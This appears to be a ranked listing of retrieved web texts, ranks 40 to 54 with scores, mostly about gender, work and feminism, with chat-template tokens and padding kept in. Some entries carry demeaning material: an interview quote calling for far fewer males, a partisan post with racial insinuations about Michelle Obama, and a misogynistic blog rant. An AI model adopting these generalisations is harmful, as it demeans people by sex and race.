idea at all. If life is to survive on this planet, there must be a decontamination of the Earth. I think this will be accompanied by an evolutionary process that will result in a drastic reduction of the population of males. People are afraid to say that kind of stuff anymore. + +WIE: Yes. I find myself now thinking that's a bit shocking. + +MD: Well, it's shocking that it would be shocking. + +WIE: So it doesn't sound like your vision of a separate nation for women is something you see as an interim stage that would eventually lead to men and women living together in true equality. + +MD: No. That's a very old question. I answered that to audiences twenty-five, thirty years ago. I just don't think that way. See, right now, I would be totally joyous to have a great community of women whether men are somewhere out on the periphery or not. I don't have this goal of: "Oh, then we can all get together again!" That doesn't seem to be a very promising future. So why would I think about it? I think it's pretty evident that men are not central to my thought. + +WIE: I have one last question. At the beginning of this interview, you spoke about the experience of being deeply at one with that which animates all of life. I wanted to ask you what you think about the possibility of becoming identified with that as who one ultimately is, having that as one's ultimate resting place, or ground, so to speak, and where one's gender would no longer be a primary reference point. + +MD: I don't know if that has anything to do with my experience. I have my own experience of oneness. +================================================================================ +Rank = 40; Score = 473088.0 +<|begin_of_text|>There’s already been time for the launch, reception of, and backlash against the new women’s website Bustle.com and its founder, Bryan Goldberg. + +Somewhere in some distant and undoubtedly frightening corner of the internet, there may already be a backlash against the backlash. + +The basic premise is a simple, stupid, and unfortunately familiar one: a man decided to do something for women and finally do it RIGHT, dad gum it, ignoring that there were already women doing this thing, and despite his own total cluelessness about the topic at hand. The man in this case is Bryan Goldberg, founder of the also not-great media outlet Bleacher Report. + +Goldberg decided it was time for a “women’s publication that puts world news and politics alongside beauty tips.” He managed to raise $6.5 million in venture capital to do this. (Bustle’s editorial team is entirely female [UPDATE: There are at least two men writing regularly for Bustle], and Goldberg has indicated an alleged lack of interest in editorial decisions with the statement, “Knowing the difference between mascara, concealer, and eye-liner is not my job,” but the company is very clearly headed by a man.) Maybe the reason Goldberg didn’t realize he was years behind the curve on this idea is that he thinks Vogue and Glamour are the frontrunners of online women’s media, theorizing that since Vogue had “fewer than 1 million unique visitors in June,” there was an obvious void for Bustle to step into. (Jezebel had 2.1 million unique visitors per month three years ago, and now has 5.1 million monthly visitors.) (And Glamour does include politics with its beauty tips.) Ironically, one of the publications Goldberg identified as being “aimed at men,” Business Insider, has even posted a piece covering women’s frustration with this move. All in all, it’s quickly become abundantly clear that Goldberg decided to execute a bad idea without deciding to learn anything about it first. And still got financing for it. + +In this unbelievably misguided launch piece, Goldberg dares to assert the following: + +“Women’s publishers have completely lost sight of which decade their readers are living in. This is a country where women out-graduate men. They are also closing the “income gap” quickly, and in many cities, they out-earn their male counterparts. But magazines like UsWeekly talk to women as though they were children, and they fail to connect popular culture with any form of social commentary.” + +The statement +================================================================================ +Rank = 41; Score = 466944.0 +<|begin_of_text|>Michelle Obama: Spokesperson for the Lying Left + +Race-baiter Michelle Obama returns to tell America just how racist the Republican Party. She says the Republicans made people “not trust” politics. + +At the Pennsylvania Conference for Women, Michelle Obama said when she attended the State of the Union address she got uncomfortable as she noticed on the Republican side of the room there was “all white men.” + +According to Breitbart: + +“At the State of the Union address … when you are in the room what you can see is this real dichotomy. It’s a feeling of color almost. On one side of the room is literally gray and white. Literally, that is the color palette on one side of the room. On the other side of the room, there are yellows and blues and whites and greens. Physically, there’s a difference in color, in the tone, because on one side all men, all white, on the other side some woman, some people of color.” take our poll - story continues below Will the media learn anything from their biased reporting of the Jussie Smollett story? Will the media learn anything from their biased reporting of the Jussie Smollett story? + +Will the media learn anything from their biased reporting of the Jussie Smollett story? * Yes, they've gotten so much wrong recently that they're bound to be on their best behavior. No, they suffer from a bad case of Trump Derangement Syndrome. Jussie who? + +Email * + +Email This field is for validation purposes and should be left unchanged. Completing this poll grants you access to The Black Sphere updates free of charge. You may opt out at anytime. You also agree to this site's Privacy Policy and Terms of Use. Trending: SCOTUS Justice Send Warning to FAKE NEWS Journalists She continued, “I look at that, and I go, no wonder. No wonder we struggle, no wonder people don’t trust politics. We’re not even noticing what these rooms look like.” + +Hard to believe how “sensitive” Michelle Obama can be. + +Exactly what have white men done to Michelle Obama? She lived in a black-centric world. And if any men took advantage of her, you can bet they weren’t white. Yet, she appears to have a psychosis for white men. + +One would think her fear of white men would have dwindled, given the number of white men it took to get her husband elected? What of those “white men”? + +And what of Michelle Obama obsession with +================================================================================ +Rank = 42; Score = 462848.0 +<|begin_of_text|>Taipei, May 28 (CNA) Six female volunteer soldiers are to be posted on remote Taiwan-controlled islands in the South China Sea, the Coast Guard Administration (CGA) said Tuesday. + +The six women, aged between 19 and 24, will be the first female Taiwanese soldiers ever to serve on the Dongsha (Pratas) Islands and Taiping Island in the Spratly Islands, according to the administration. + +They are among some 21 volunteer soldiers who are receiving training for service on the two South China Sea islands, a CGA official said. + +"Three of them are preparing to work on the Dongsha Islands and the other three are going to Taiping Island," the official said. + +At present, 100 soldiers and officers are serving on Taiping Island, the largest islet in the Spratlys, while 150 officers and enlisted men are working on the Dongsha Islands. + +"All of them are men," the CGA official said. + +The six women are scheduled to begin their service on the islands in late June, the official said, adding that relevant facilities, including female dormitories, have been set up in preparation for their arrival. + +Taiping Island lies 1,600 km to the southwest of Kaohsiung, while the Dongsha islands are 450 km to the southwest of the southern port city. + +As Taiwan has decided to move from a conscription to an all-volunteer military by the end of 2014, the CGA has been carrying out a recruitment drive since the beginning of this year. + +(By Liu Chien-pang and Sofia Wu) + +ENDITEM/J<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 460800.0 +<|begin_of_text|>Silicon Valley Photo: HBO + +HBO’s Silicon Valley captures a world you’ve rarely seen depicted with intelligence or care, populated by types that you didn’t know were types; it’s sometimes sweet but often brutal, but thanks to the keen satirical eye of its co-creator, Mike Judge (Office Space), you never feel that you’re watching unfair swipes. It’s about prospectors in what might be the last remaining gold rush, the world of tech in Northern California. That so many of the claims yield fool’s gold gives the characters’ grandiose pronouncements about their own talent a certain poignancy. Everybody on this show wants to be the next Steve Jobs, but a lot of them are lucky just to have jobs. “Do you know how sea turtles have, like, a shit-ton of babies?” asks a tech-industry-lawyer character. “Because most of them die on the way down to the water.” + +Silicon Valley, which premieres Sunday, April 6, fuses the white-collar purgatory of Office Space with the Hollywood wonderland of knaves and fools depicted on Entourage, Curb Your Enthusiasm, and The Larry Sanders Show. The place is a human zoo filled with narcissists, most of whom would be insufferable if they weren’t so nakedly needy. The hero, Richard (Thomas Middleditch), is a classic Mike Judge everyman, with an added dose of brilliance and perhaps a mild case of Asperger’s. He lives and works in a ranch-style house known as an “incubator.” Its owner is Erlich (T. J. Miller), an arrogant pothead who sold his own start-up years ago and rolled the money over into this for-profit commune, where would-be entrepreneurs live in exchange for promising Erlich 10 percent of anything they sell. On Entourage, this setup would have yielded a nonstop series of deranged bacchanals, but here it seems about as randy as a meeting of a high-school yearbook committee, minus the girls. Like Silicon Valley the place, Silicon Valley the show is so male that it seems as if somebody dropped a bomb in Palo Alto that eliminated most of the women. The writers mock this borderline ­monoculture at every turn. The show kicks off at a private party at which Kid Rock sings but no one dances and the segregation of men and women is so drastic that a character likens it to “a Hasidic wedding.” The house’s lone non +================================================================================ +Rank = 44; Score = 458752.0 +<|begin_of_text|>In college, I was in a sort of “future broadcasters” club with a bunch of other students who were looking to do television hosting, news anchoring, radio announcing, podcasting, etc. The majority of us were women, so we often talked about gender-specific issues. When Gretchen Carlson sued Roger Ailes for sexual harassment earlier this month, I wasn’t shocked; my classmates and I had learned from an Emmy-winning producer just how common behavior like Carlson described was in newsrooms across the country. + +While at this point, we simply don’t know if the allegations are true, we also learned that if we ever experienced harassment of any sort, we should go to our boss immediately. In fact, in the nine places I’ve worked, I was told to do that every time. At Barnes & Noble, my managers asked a man who was saying lewd things to me to leave the premises. At the spa where I worked reception in college, the owner believed me the moment I told her we were getting creepy phone calls. She helped me create a list of the phone numbers making the calls. When one of them called the next time, she picked up and let them have it. That gave me the impression I was valued. My safety was prioritized above a sale. + +Since the second wave of feminism in the 1960s and ’70s, women have been infiltrating and dominating the workforce through nearly every field, but it’s no secret that walking into a well-established boys’ club can be a dangerous gamble. That doesn’t mean it shouldn’t be done. One of the important roles of a manager in the workplace is to provide support to employees who need it. Women who believe they were harassed on the job are employees who need it. Bosses should be the first line of defense against an alleged hostile work environment. + +That’s why what Neil Cavuto did this week is so unconscionable. He defended Ailes against Carlson’s allegations and as someone who has a show on Fox News Channel, he joined ranks with a host of other employees of the network. Unlike Harris Faulkner or Greta Van Susteren or Geraldo Rivera, though, he isn’t just a host. According to the Fox website, he is also senior vice president and managing editor of not only Fox News Channel, but Fox Business, too. + +That means Cavuto is someone’s boss. He is a lot of people’s boss. Many of them are undoubtedly women. By choosing to put more effort into his role as +================================================================================ +Rank = 45; Score = 454656.0 +<|begin_of_text|>A new MSN poll for Business Insider found that the majority of men and women still prefer the company of men at work. + +And it’s not just men supporting their own gender: One in five men and women said they would rather work with a male colleague. + +Perhaps this male confidence also stems from believing in their own success. + +Most men in the MSN poll believed that the gender gap is an issue of the past. 40% of men surveyed said that women are treated “very fairly” in the workplace while only 17% of women believed the same. This reinforces a separate study that found 58% of U.S. men in the workforce believed that “all obstacles to gender equality are gone.” + +That’s what researchers found in studies on confidence in the workplace: men are more confident —almost unquestioning— in their abilities and more confident that when things go wrong at work, it’s their gender, and not their performance, that’s to blame. As Ladders has previously reported, male leaders have an advantage and are better liked — across generations. + +Millennial men believe men make better leaders + +Multiples studies got the same result: men are very confident in their abilities—so confident that they suspect discrimination when they don’t get the job. Out of the 8,000 millennials aged between 18-34 that Qualtrics and Accel surveyed, 33% of millennial men believed that they had faced frequent gender discrimination at work, compared with the 21% of millennial women who felt the same way. + +Moreover, millennial men were 50% more likely to believe that their gender was “affecting their career opportunities,” although Qualtrics didn’t say whether the men believed the effect was positive or negative, meaning whether the men believed they received better or worse opportunities because of their gender. + +Meanwhile, women were more likely to believe in gender equality at work, with 41% believing that men and women are “judged by the same criteria in the workplace.” + +The Qualtrics study also showed vastly different views between young men and women on what makes a good boss or leader. + +For instance, millennial men are more likely than their female counterparts to believe that men are more effective leaders, with 38% of young men saying that compared to 14% of young women. + +And, while millennial men and women both mostly had no preference for their boss’s gender, they tend to favor strictly gender-limited workplaces: Two-thirds of millennial women and 72% of men prefer to work +================================================================================ +Rank = 46; Score = 452608.0 +<|begin_of_text|>The Anatomy of a Large-Scale Hypertextual Web Search Engine + +Sergey Brin and Lawrence Page + +{sergey, page}@cs.stanford.edu + +Computer Science Department, Stanford University, Stanford, CA 94305 + +Abstract + +In this paper, we present Google, a prototype of a large-scale search engine which makes heavy use of the structure present in hypertext. Google is designed to crawl and index the Web efficiently and produce much more satisfying search results than existing systems. The prototype with a full text and hyperlink database of at least 24 million pages is available at http://google.stanford.edu/ + +To engineer a search engine is a challenging task. Search engines index tens to hundreds of millions of web pages involving a comparable number of distinct terms. They answer tens of millions of queries every day. Despite the importance of large-scale search engines on the web, very little academic research has been done on them. Furthermore, due to rapid advance in technology and web proliferation, creating a web search engine today is very different from three years ago. This paper provides an in-depth description of our large-scale web search engine -- the first such detailed public description we know of to date. + +Apart from the problems of scaling traditional search techniques to data of this magnitude, there are new technical challenges involved with using the additional information present in hypertext to produce better search results. This paper addresses this question of how to build a practical large-scale system which can exploit the additional information present in hypertext. Also we look at the problem of how to effectively deal with uncontrolled hypertext collections where anyone can publish anything they want. Keywords: World Wide Web, Search Engines, Information Retrieval, PageRank, Google + +1. Introduction + +1.1 Web Search Engines -- Scaling Up: 1994 - 2000 + +1.2. Google: Scaling with the Web + +These tasks are becoming increasingly difficult as the Web grows. However, hardware performance and cost have improved dramatically to partially offset the difficulty. There are, however, several notable exceptions to this progress such as disk seek time and operating system robustness. In designing Google, we have considered both the rate of growth of the Web and technological changes. Google is designed to scale well to extremely large data sets. It makes efficient use of storage space to store the index. Its data structures are optimized for fast and efficient access (see section 4.2). Further, we expect that the cost to index and store text or HTML will eventually decline relative to the amount that will be available +================================================================================ +Rank = 47; Score = 452608.0 +<|begin_of_text|>Months after he was supposed to give away more than $100,000 for college scholarships, Milo Yiannopoulos says all of the money is still sitting in his bank account. + +The Breitbart editor and professional political agitator (recently banned from Twitter for harassment) came under fire this week as allegations surfaced that his charity, which would provide college scholarships exclusively to white men, has so far done no charity work with the money. + +Yiannopoulos told The Daily Beast on Thursday that his lawyers are drafting paperwork that would establish it as a legal charity, but experts say that the way in which the “Yiannopoulos Privilege Grant” accepted donations was unethical and possibly illegal. + +Yiannopoulos promised in January to create a college scholarship fund for “white men who wish to pursue their post-secondary education” that would be awarded in “early summer 2016.” The fund has raised somewhere between $100,000 and $250,000 to date, Yiannopoulos told The Daily Beast via email. + +But the Yiannopoulos Privilege Grant has not filed any paperwork to become a charity in the United States. When asked if an application for tax-exempt status had been sent by his lawyers to the Internal Revenue Service, Yiannopoulos said, “I’ll check.” + +No scholarships have been awarded and the charity’s website shows there isn’t even a way for prospective students to apply for them. + +The grant program was announced with the self-congratulatory fanfare typical of many Breitbart articles written about its chief firebrand. + +“In a move certain to infuriate the left, Breitbart Tech Editor Milo Yiannopoulos has created the Yiannopoulos Privilege Grant, a scholarship exclusively available to white men who wish to pursue their post-secondary education on equal footing with their female, queer and ethnic minority classmates,” staff writer William Bigelow wrote in Breitbart, providing a wide audience for the grant’s publicity, on Jan. 21 this year. + +The promise at the time was that the fund would disburse 50 grants of $2,500 to poor, young white men, a move intended to rile the left and raise the profile of the website and the so-called alt-right, a movement whose ascendancy reached new heights this week when Breitbart News executive Steve Bannon was made chairman of Donald Trump’s presidential campaign. + +After the initial announcement in January, Yiannopoulos and several figures in the alt-right hosted a five-hour online telethon to collect money from donors. In the description for the video on Yiannopoulos’s account, there is a +================================================================================ +Rank = 48; Score = 450560.0 +<|begin_of_text|>Photos via Facebook. + +In front of Calgary City Hall, a couple dozen of them stood shoulder-to-shoulder in an attempt to make an unbreakable human wall. Each of them wore a uniform consisting of a black T-shirt emblazoned with a Roman helmet—a look that wouldn't be out of place in a biker gang. It was a line filled with mostly men, and a few women, who you wouldn't want to go toe-to-toe with in a bar. All of them were white. + +Some of the III% (the "three percent," as they call themselves) brought shock canes—a non-lethal weapon that can deliver up to a million volts to the person hit—while others had billy clubs or regular old canes. On many of the shirts was the III%'s credo, "NSA"—Never Standing Alone. Scattered throughout the rest of the square were small groups overseeing the proceedings from an elevated position, as well as III%er members dressed in plain clothes milling about the crowd gathering "intel" on what they considered to be the day's enemy—Antifa, the anti-fascist group. + +In front of the line their leader, Beau Welling, the president of the Alberta chapter and national vice-president of the III%, stood calling commands quietly into a mobile phone he held like a walkie talkie. + +A few hours earlier, the group had swept the perimeter checking the potted plants that surround the municipal building for any improvised explosive device. They were concerned that ISIS might target the event or that Antifa may have planted weapons beforehand. + +Beau Welling in front of his group at the Calgary rally. Photo by Mack Lamoureux. + +The group of III%ers was attending the rally as "security detail" for a controversial anti-Islam speaker named Sandra Solomon, who was involved in a dust up with anti-fascists in Winnipeg a few days prior. Welling had made it clear to the group beforehand that attendance was mandatory, citing the Winnipeg incident and partisan violence south of the border. + +This was effectively the III% Alberta's coming out party—a planned operation that they called "Operation Shock N Awe"—and a show of force by a far-right anti-Islamic organization that claims to be heavily armed and ready for "war" on Canadian soil. + +An eight-month VICE Canada investigation into the inner workings of the group has found it to be a tight-knit openly anti-Islamic group that is unique in Canada's far-right ecosystem—one that, as +================================================================================ +Rank = 49; Score = 446464.0 +<|begin_of_text|>What do you think are the reasons why high school students make it — but stop there? College is a whole four years, but not everyone goes through with it. What holds them back? + +We looked at several sources on the Internet and found that these are the main contributing factors: + +Homesickness and feeling that you don’t fit in. It’s a whole new world out there, and you may not be ready to embrace it. Educational burnout. While college gives you control and flexibility over your schedule, the hard demanding schedule, challenging courses, and boatload of homework certainly has turned a lot of students away from the desire to continue. Academic unpreparedness. Sometimes, high school didn’t really prepare students for college. Other times, students slacked off in high school and paid the price during their post-secondary years. The high school goal was to pass (so that students could get into college); in college, it is to succeed. Personal or family issues. You may have had an unfortunate illness in the family or you yourself just got totally get stressed out from the workload. Financial constraints. Tuition costs continue to soar, and scholarships or grants are not always available. Additionally, financial situations can change from year to year. Too much fun — but not enough education. Some students take advantage of their friendships, which could put them on academic probation due to suffering grades or absence in classes. The school isn’t a good academic fit for the student. You’ve selected a great school that is very arts-centric. However, you realize that you like the sciences better. Similarly, you may hate the average class size of 100 and prefer much smaller classes for more individualized attention. Setting sights on the wrong major. You may have wanted to be a doctor but after taking several science classes, you decided that you’re rather go into marketing. Does your school have a marketing major? If not, you’re likely to go elsewhere. No guidance or mentors. In high school, teachers and counselors were there to guide you, as high school classes are typically smaller than the entering freshman class. It’s a lot harder to get the personalized attention that you’ve been used to and that could turn people off quickly. External demands, particularly within part time or full time employment. Can we say Mark Zuckerberg and Facebook? When the job puts too many demands on you, you may have to choose, and money usually wins out. Time to move out. If the cold winter just doesn’t suit you, you may decide to go elsewhere. You may want +================================================================================ +Rank = 50; Score = 444416.0 +<|begin_of_text|>The Federal Treasury is on the verge of bailing out Wall Street with an infusion of $700 billion of taxpayer dollars. Bad decisions by many actors (banks and lenders, consumers, insurers and others) have contributed to the crisis, we are told, and now it is an emergency. + +What a difference a policy area makes. + +In our nation’s social welfare programs, such as the Temporary Assistance for Needy Families (TANF) program, bad decisions are grounds for sanctions and a denial of assistance–not a helping hand or a cash infusion (Just imagine!). Certainly, our leaders have not treated poverty as an emergency or a reason for government action. + +Other differences abound…. + +Corporate welfare: Corporate executives, mostly men, being bailed out. + +Social welfare: Mostly low-income women with children, being given minimal assistance, and certainly not enough to help move them out of poverty. + +Corporate welfare: Few restrictions on the money. + +Social welfare: TANF beneficiaries face numerous restrictions, including having to sign a “personal responsibility” statement in some states (Something, personally, I’d like to see these corporate executive do). + +Corporate welfare: It is a major “concession” not to cap compensation to the executives in the affected firms. + +Social welfare: Under TANF, most states impose income and asset limits on eligibility. For assets, these limits are generally between $2,000 and $3,000. In some states, if your car is worth much more than this, you are not eligible. (States similarly limit eligibility for Food Stamps and Medicaid.) + +So, how many of our corporate executives would be disqualified from the bailout if this were taken into account? + +Corporate welfare: Few details about the accountability required under this bailout are available. Given the lobbying frenzy around the agreement, don’t expect much. + +Social welfare: Significant oversight, including additional and burdensome requirements around supervision and documentation of program participation enacted in 2005 and codified in regulations earlier this year. + +Corporate welfare: $700 billion. + +Social welfare: $16 billion per year, which has not changed since 1996. + +Just think what a $700 billion investment in poverty reduction could do. Bailouts to help low-income single mothers get job training to move them into careers with good pay and benefits, and a lifetime of economic independence. Bailouts to support access to quality child care so that single mothers could afford to leave their children in a safe environment while they go to work. Bailouts to support transportation vouchers that would get low-income parents to job training sites or works +================================================================================ +Rank = 51; Score = 442368.0 +<|begin_of_text|>Wesleyan University said Monday that campus fraternity groups will soon be required to admit both men and women, a change that followed a lawsuit by a student saying she was raped at a frat party and that came amid growing scrutiny of colleges’ efforts to combat campus sexual assault. + +“With equity and inclusion in mind, we have decided that residential fraternities must become fully co-educational over the next three years,” top university officials said in an email to the university community. + +“If the organizations are to continue to be recognized as offering housing and social spaces for Wesleyan students, women as well as men must be full members and well-represented in the body and leadership of the organization,” said the email from Joshua Boger and Michael S. Roth, the chair and president of the Board of Trustees, respectively. + +The move comes after a student filed a lawsuit saying she was raped in 2o13 at a fraternity party, and that multiple party attendees watched. The email said the school had been considering what to do about Greek life at Wesleyan for years, and received input over the summer from students, faculty and alumni. + +The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now + +Other schools like Trinity College have made similar changes in recent years (though not without student protest). The Wesleyan website reads, “Greek life is small at Wes.” There are a small number of fraternities on campus, some with houses and some without. There is only one sorority and it does not have a house. The school already has other co-ed societies. + +Read the email here. + +Contact us at editors@time.com.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 442368.0 +<|begin_of_text|>An experimental Marine Corps study obtained by the Monitor has concluded that units with both men and women are less effective than all-male units. + +The results of the experiment, known as the Ground Combat Element Integrated Task Force (GCEITF), could be used by the Marines as grounds to ask for an exemption to the combat exclusion policy, which currently bars women from taking part in direct combat. + +The services have until January to open all jobs to women, or ask Pentagon leaders for an exemption by October. + +The GCEITF included roughly 200 male and 75 female volunteers, who were evaluated on how they performed a series of physical combat tasks between March and May. + +The results of the study come on the heels of news last month that two women passed the Army’s grueling Ranger School and earned their Ranger tabs. + +The Marine Corps’ conclusions have sparked criticism from female Marines and others, who argue that the study was poorly conducted and biased toward a belief that men are biologically and psychologically built to be better fighters. + +Indeed, efforts to integrate combat units constitute “social engineering,” Lt. Gen. Gregory Newbold, a former Marine infantryman who served as Director of Operations on the Pentagon’s Joint Staff before he retired, argued in an op-ed this week that was widely seen as laying the groundwork for the Marines’ experimental task force study release. + +In introducing its conclusions, the Marine Corps cites the “the brutal and extremely physical nature of direct ground combat, often marked by close, interpersonal violence.” + +It further argues that the nature of battle “remains largely unchanged throughout centuries of warfare, despite technological advancements.” + +Mr. Newbold echoes similar points, citing “the burden of 30 to 80 pounds of personal equipment, mind-bending physical exertion, energy-sapping adrenaline highs, or the fact that the threadbare clothes you wore were unchanged for over three weeks and may have been'scented' by everything from food, to blood, dysentery, and whatever was in the dirt that constituted your bed. And don’t forget insects of legendary proportion and number,” he adds in his op-ed, published by the War on the Rocks, a highly-regarded military blog. + +“More importantly,” Newbold argues, are the bonds with comrades who experienced the “shared duties of clearing the urinals, the pleasures of a several nights of hilarious debauchery, and multiple near-death experiences – a comrade in arms who has heard more about your personal thoughts than your most intimate friends or family.” + +Though Newbold acknowledges that the two +================================================================================ +Rank = 53; Score = 436224.0 +<|begin_of_text|>By the time a person turns 80, her life has consisted of 29,200 days. In the case of Gabriele Köpp, that life has included a high-school education and a training program as a physical and technical assistant. It has also included an affinity for "pure mathematics," as Köpp calls it, and for physics. + +She is fascinated with the power of the tiniest particles, or, quoting Goethe, with "what holds the world together in its innermost self." Because of her fascination for elementary particles, she went on to earn a doctorate in physics and eventually became a university professor. + +Her life has also included many friendships, primarily with men, from doctoral students to colleagues to Nobel laureates. And there are also eight godchildren in her life. + +Nevertheless, for Gabriele Köpp, what happened in the space of only 14 days was enough to cast a dark shadow over the rest of her life, the remainder of those 29,200 days. + +No Home to Return To + +Köpp is sitting in an armchair in her Berlin apartment, talking about those 14 days. She serves freshly brewed coffee with condensed milk out of a can. She smokes the long, thin Kim brand of cigarettes, which have become rare in Germany. + +There are black-and-white photographs of her mother, her father and her sisters hanging on the walls. They are all dead. There are also photos of her parents' house, including exterior and interior views. The house was in Schneidemühl, a town in the former German region of Pomerania; today the town is called Pila and is located in northwestern Poland. Where the house stood is nothing but a meadow today. + +Köpp describes the photos with German words from a distant era: the Salon with its chandelier, her father's Herrenzimmer ("study"). Her pronunciation also betrays her roots. She says "Tack" instead of "Tag" (the informal version of "Guten Tag," or "hello"), just like many others who originally come from regions that were once German and are now Polish. + +Köpp's apartment is not one of those long-occupied flats that contain layer upon layer of the possessions its occupant has accumulated over the years. She only took the apartment about 10 years ago, when she retired from her position at the Technical University of Aachen in western Germany and moved to Berlin. When asked whether she thinks it's unusual for someone to move at that age +================================================================================ +Rank = 54; Score = 434176.0 +<|begin_of_text|>Looking back, we had, in the person of Teddy Roosevelt, the finest President in the history of this country. He had the spirit and determination that matched the times and the land. Then the women got the vote, and everything went to hell. While our boys was overseas fighting the Kaiser, the women got Prohibition put in. Drinking and gambling and whoring were declared unlawful. All those things which come natural to men became crimes. –The Life and Times of Judge Roy Bean + +One of the more obvious aspects of the modern lynch mob is it is almost always composed of women. Sure, there will be men tagging along, maybe throwing in some shots of their own, but the organizers are always women. Maybe a homosexual male will start it with a point and shriek, but 99 times out of 100, the person organizing the lynch mob is going to be a woman. She will sound the alarm and the rest of the coven will arrive, ready to set fire to the wicker man. + +The social justice warrior phenomenon is mostly a product of Facebook and Twitter, as these services made it easier for stupid people to get on-line and blast their idiocy worldwide. As a result, unhinged young women now have easy access to a megaphone. Whenever one of them gets the boo-hoos or feels slighted by a man, she can give a couple of blasts on the horn and before long we have #gamergate or some other nonsense controversy. + +That’s the most striking feature of the social justice warrior phenomenon. It is young, unattached females. Put #gamegate into a google machine and the third hit is a blog run by a lonely, unstable female. In fact, feminism today is just that, lonely unattached females looking for a purpose to their lives. Instead of snagging a 